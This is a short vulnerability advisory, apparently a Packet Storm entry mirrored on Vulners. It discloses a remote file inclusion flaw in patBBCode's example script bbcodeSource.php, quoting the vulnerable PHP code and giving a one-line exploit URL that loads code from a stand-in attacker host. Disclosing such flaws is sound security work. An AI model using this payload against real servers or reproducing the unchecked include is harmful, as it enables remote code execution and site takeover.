Lucene search
K

patbb-rfi.txt

🗓️ 13 Nov 2007 00:00:00Reported by p4sswdType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Vulnerability in patExampleGen bbcodeSource.php file

Code
`Link to download:  
http://www.php-tools.net/site.php?file=patBBCode/overview.xml  
  
Vuln file:  
examples\patExampleGen\bbcodeSource.php  
  
Vuln code:  
if( !isset( $_GET['example'] ) )  
die( 'No example selected.' );  
  
$exampleId = $_GET['example'];  
  
ob_start();  
  
// make the example think it's still in the right place  
chdir( '../' );  
  
// include the example  
require $exampleId.'.php';  
  
ob_end_clean();  
  
Exploit:  
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation